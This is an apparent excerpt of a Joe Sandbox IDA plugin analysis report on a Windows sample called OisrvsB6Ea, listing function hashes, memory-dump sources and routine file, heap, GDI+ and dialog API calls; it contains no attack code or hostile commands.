                                                                                  • Opcode ID: a4d39d4f28002f41ee4878eb8a996c0ebfa12247109f9a716c275b44e2920398
                                                                                  • Instruction ID: 5a01f2329573fde13348d599008aef565546028362a98ada7be7fef0b00ef9f7
                                                                                  • Opcode Fuzzy Hash: a4d39d4f28002f41ee4878eb8a996c0ebfa12247109f9a716c275b44e2920398
                                                                                  • Instruction Fuzzy Hash: 08517770D203069FDF26CF71EA856BBBBE4EF42300F14446ED4968B691DB349916CBA0
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00279A50,?,?,00000000,?,?,00278CBC,?), ref: 00279BAB
                                                                                  • GetLastError.KERNEL32(?,00000000,00278411,-00009570,00000000,000007F3), ref: 00279BB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 6fa09fcd2e9247fe0610b2eedfba034db2dcd1e93f24e1ba971d1c20b01ff58b
                                                                                  • Instruction ID: f54451033773fc4837682b37115d4ea6c7a75138b84545bf40169a46c594cd2d
                                                                                  • Opcode Fuzzy Hash: 6fa09fcd2e9247fe0610b2eedfba034db2dcd1e93f24e1ba971d1c20b01ff58b
                                                                                  • Instruction Fuzzy Hash: A041F231624302CFDB24DF19E58456AB7EAFFD5324F14DA2DE88983260D7B0ED948B51
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00271E55
                                                                                    • Part of subcall function 00273BBA: __EH_prolog.LIBCMT ref: 00273BBF
                                                                                  • _wcslen.LIBCMT ref: 00271EFD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2838827086-0
                                                                                  • Opcode ID: 05dee3f3475705b7c33fc8d90996ec7919edea36242ce6b1c2009a6d803141c0
                                                                                  • Instruction ID: 0082c6f0db388b301c30615780bcb3149883875f6ac1bde746e5be004b0b91b9
                                                                                  • Opcode Fuzzy Hash: 05dee3f3475705b7c33fc8d90996ec7919edea36242ce6b1c2009a6d803141c0
                                                                                  • Instruction Fuzzy Hash: F8314A719252099FCF15EF98C945AEEBBF9AF08304F104069E889B7291CB325E21CF61
                                                                                  APIs
                                                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002773BC,?,?,?,00000000), ref: 00279DBC
                                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00279E70
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlushTime
                                                                                  • String ID:
                                                                                  • API String ID: 1392018926-0
                                                                                  • Opcode ID: 7a90088b0928f409338abeecd53eab76acd14dd629d79c2a0780f1724c72fd8e
                                                                                  • Instruction ID: 5fc1a2ca86389fa699d515f300e54d61471aa0e6dc67fe1d98028bc9a2f0dc6b
                                                                                  • Opcode Fuzzy Hash: 7a90088b0928f409338abeecd53eab76acd14dd629d79c2a0780f1724c72fd8e
                                                                                  • Instruction Fuzzy Hash: 132126312693469FC724EF34C491AABBBE8AF52304F08885DF8C983181D338D96DCB61
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00279F27,?,?,0027771A), ref: 002796E6
                                                                                  • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00279F27,?,?,0027771A), ref: 00279716
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5b61245040cf8c11b51d79f9cebd7905fe73b49f9c9907e77f2b2cdf6a19aa13
                                                                                  • Instruction ID: 6680d2664aa145a4b82103637fa4a7283843134eb089436799e08cb62889cd1d
                                                                                  • Opcode Fuzzy Hash: 5b61245040cf8c11b51d79f9cebd7905fe73b49f9c9907e77f2b2cdf6a19aa13
                                                                                  • Instruction Fuzzy Hash: D621CFB1520345AFE3309E65CC89FB7B7DCEB49324F108B19FA99C21D1C7B4A8948A31
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00279EC7
                                                                                  • GetLastError.KERNEL32 ref: 00279ED4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 90290269ad923e2c1be1b5453f6c3a7cb0e49c5970f0a22f937ae82d25fa9d6e
                                                                                  • Instruction ID: ff00719ce1f9e0731cf5e075a94c28a94dc253e372896d97988edd12d551f0db
                                                                                  • Opcode Fuzzy Hash: 90290269ad923e2c1be1b5453f6c3a7cb0e49c5970f0a22f937ae82d25fa9d6e
                                                                                  • Instruction Fuzzy Hash: F7114C306207019BD734CA28CC44BB6B3E9EB05370F608A2AE557D26D0D7B0EDA5C760
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00298E75
                                                                                    • Part of subcall function 00298E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,002B1098,002717CE,?,?,00000007,?,?,?,002713D6,?,00000000), ref: 00298EB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocAllocate_free
                                                                                  • String ID:
                                                                                  • API String ID: 2447670028-0
                                                                                  • Opcode ID: 60722a857d4f7b25129d60a38d79bd006793e0377b7fb106b7364b1636f477f8
                                                                                  • Instruction ID: 4402b9aadf25a57f761b9008f16d5ceee21df3376d12ed6cf6c8c7c83eaa0111
                                                                                  • Opcode Fuzzy Hash: 60722a857d4f7b25129d60a38d79bd006793e0377b7fb106b7364b1636f477f8
                                                                                  • Instruction Fuzzy Hash: 9FF0F632A3120366DF216E25AC15B6F37589F83B70F2C412AF998A7191DF71CD2085A0
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 002810AB
                                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 002810B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                  • String ID:
                                                                                  • API String ID: 1231390398-0
                                                                                  • Opcode ID: a7f3b8e6831bffe3888e72c60a1447868059937351d23f99c84fcfed23b8847d
                                                                                  • Instruction ID: 13b5a3cb425dc48f9dae4a0959621ee1ee9d71254ec2617c4537a10f667baf94
                                                                                  • Opcode Fuzzy Hash: a7f3b8e6831bffe3888e72c60a1447868059937351d23f99c84fcfed23b8847d
                                                                                  • Instruction Fuzzy Hash: F6E0D836B21146A7DF09DBB49C099EB73DDEA452043104175E803D3281F930EE564760
                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A501
                                                                                    • Part of subcall function 0027BB03: _wcslen.LIBCMT ref: 0027BB27
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A532
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2673547680-0
                                                                                  • Opcode ID: 7bd1153ca265511761cbf26f717eb11f84c4b9686ac51469e9fd9857300447e8
                                                                                  • Instruction ID: 6632543b747fb1a69364abbdad354207ef8f31684c59c3f87312987ce94cad3a
                                                                                  • Opcode Fuzzy Hash: 7bd1153ca265511761cbf26f717eb11f84c4b9686ac51469e9fd9857300447e8
                                                                                  • Instruction Fuzzy Hash: C7F0303265110ABBDF015F60DC45FDE376CBB05389F44C051BD49D5160DB71DAA8DB50
                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(000000FF,?,?,0027977F,?,?,002795CF,?,?,?,?,?,002A2641,000000FF), ref: 0027A1F1
                                                                                    • Part of subcall function 0027BB03: _wcslen.LIBCMT ref: 0027BB27
                                                                                  • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0027977F,?,?,002795CF,?,?,?,?,?,002A2641), ref: 0027A21F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2643169976-0
                                                                                  • Opcode ID: b8dcfa5f080c216e22a4db0a1855f4ddc18b06e8635c76f60c770eb7b2aad1cc
                                                                                  • Instruction ID: 1866b8861499100d7f3ec37caf2821a01279c5342f2f332aa0180b3225fed304
                                                                                  • Opcode Fuzzy Hash: b8dcfa5f080c216e22a4db0a1855f4ddc18b06e8635c76f60c770eb7b2aad1cc
                                                                                  • Instruction Fuzzy Hash: 22E092355502096BDB019F60EC45FEE775CBB09395F488021BD48D2091EB71DEA4DA50
                                                                                  APIs
                                                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,002A2641,000000FF), ref: 0028ACB0
                                                                                  • CoUninitialize.COMBASE(?,?,?,?,002A2641,000000FF), ref: 0028ACB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: GdiplusShutdownUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 3856339756-0
                                                                                  • Opcode ID: 6578dd7447f3a06a57ed9fd36e443c4ea367dafdae66284c454c5b98594b254e
                                                                                  • Instruction ID: 582694331ef15fa91d5eaebe6e22407acd0c4d8f3aa870e8dc81de3b42ed5b1b
                                                                                  • Opcode Fuzzy Hash: 6578dd7447f3a06a57ed9fd36e443c4ea367dafdae66284c454c5b98594b254e
                                                                                  • Instruction Fuzzy Hash: 5FE03072544650EBCA00DB58EC06B45FBACFB49B20F044266B416936A0CB74A800CA90
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,0027A23A,?,0027755C,?,?,?,?), ref: 0027A254
                                                                                    • Part of subcall function 0027BB03: _wcslen.LIBCMT ref: 0027BB27
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0027A23A,?,0027755C,?,?,?,?), ref: 0027A280
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2673547680-0
                                                                                  • Opcode ID: 0eb916c406534017fd17da75febb4b69b4c9816ca2eb8909ce7eecec4531ecf0
                                                                                  • Instruction ID: f19af8e42298f2a7ef19d4fd28a3455cf90250c997a0beaa71c776af2c8c6602
                                                                                  • Opcode Fuzzy Hash: 0eb916c406534017fd17da75febb4b69b4c9816ca2eb8909ce7eecec4531ecf0
                                                                                  • Instruction Fuzzy Hash: 98E092365101249BCB11EB64DC09BD97758AB093E2F058261FD48E3191DB70DE54CAA0
                                                                                  APIs
                                                                                  • _swprintf.LIBCMT ref: 0028DEEC
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • SetDlgItemTextW.USER32(00000065,?), ref: 0028DF03
                                                                                    • Part of subcall function 0028B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028B579
                                                                                    • Part of subcall function 0028B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B58A
                                                                                    • Part of subcall function 0028B568: IsDialogMessageW.USER32(0001047E,?), ref: 0028B59E
                                                                                    • Part of subcall function 0028B568: TranslateMessage.USER32(?), ref: 0028B5AC
                                                                                    • Part of subcall function 0028B568: DispatchMessageW.USER32(?), ref: 0028B5B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2718869927-0
                                                                                  • Opcode ID: e8ef1cb0784edb7017da9f945583f7e816d0ef3f084c3be9004ed8eab7b92da9
                                                                                  • Instruction ID: 71fde88d1ab053b31b26237433ab147b1be00092734aaef0ca7e2fff88bfbdfe
                                                                                  • Opcode Fuzzy Hash: e8ef1cb0784edb7017da9f945583f7e816d0ef3f084c3be9004ed8eab7b92da9
                                                                                  • Instruction Fuzzy Hash: 8DE09B7581024866DF02B770DC0AFDE37AC5B05785F444851B208D60E3DA78DA208B61
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00280836
                                                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027F2D8,Crypt32.dll,00000000,0027F35C,?,?,0027F33E,?,?,?), ref: 00280858
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryLibraryLoadSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1175261203-0
                                                                                  • Opcode ID: 8aeb26b538fc2d91bdc9cd001c0b485f70909bb5cf4e12899107ef3ee11cf5cb
                                                                                  • Instruction ID: 888dfeed9f63bd40fe5c371a9d6404ffc704a3445bc6deef89228000c561bf1b
                                                                                  • Opcode Fuzzy Hash: 8aeb26b538fc2d91bdc9cd001c0b485f70909bb5cf4e12899107ef3ee11cf5cb
                                                                                  • Instruction Fuzzy Hash: 20E048768111186BDF11AB94EC49FDB77ACFF0A3D1F040065B649D2044DA74DA94CFB0
                                                                                  APIs
                                                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0028A3DA
                                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0028A3E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: BitmapCreateFromGdipStream
                                                                                  • String ID:
                                                                                  • API String ID: 1918208029-0
                                                                                  • Opcode ID: f684559215160c84cdd087a407cccafa9639f8314365b09282195f46510f8b5a
                                                                                  • Instruction ID: 04dcf076ced94a0175395a7b0f636ce5a7308ce96a72a843beabc743525153b8
                                                                                  • Opcode Fuzzy Hash: f684559215160c84cdd087a407cccafa9639f8314365b09282195f46510f8b5a
                                                                                  • Instruction Fuzzy Hash: 8AE06D75921208EBDB10EF45C800699BBE8EB05324F10805AA84693240E7B0AE20DB91
                                                                                  APIs
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00292BAA
                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00292BB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                  • String ID:
                                                                                  • API String ID: 1660781231-0
                                                                                  • Opcode ID: 071014766b9d7e34d65cf2d52572824f19ef565ff5154ad29cbc02cf88c29021
                                                                                  • Instruction ID: 4adc883a0d49664f9fa8d6af4e1172c41f17ac3f8e934f2afb13e930ec970d91
                                                                                  • Opcode Fuzzy Hash: 071014766b9d7e34d65cf2d52572824f19ef565ff5154ad29cbc02cf88c29021
                                                                                  • Instruction Fuzzy Hash: A3D02236578302F84C14AE703C3775833C5AD63B7E7A0428FF020854C1EE20847CE821
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3351165006-0
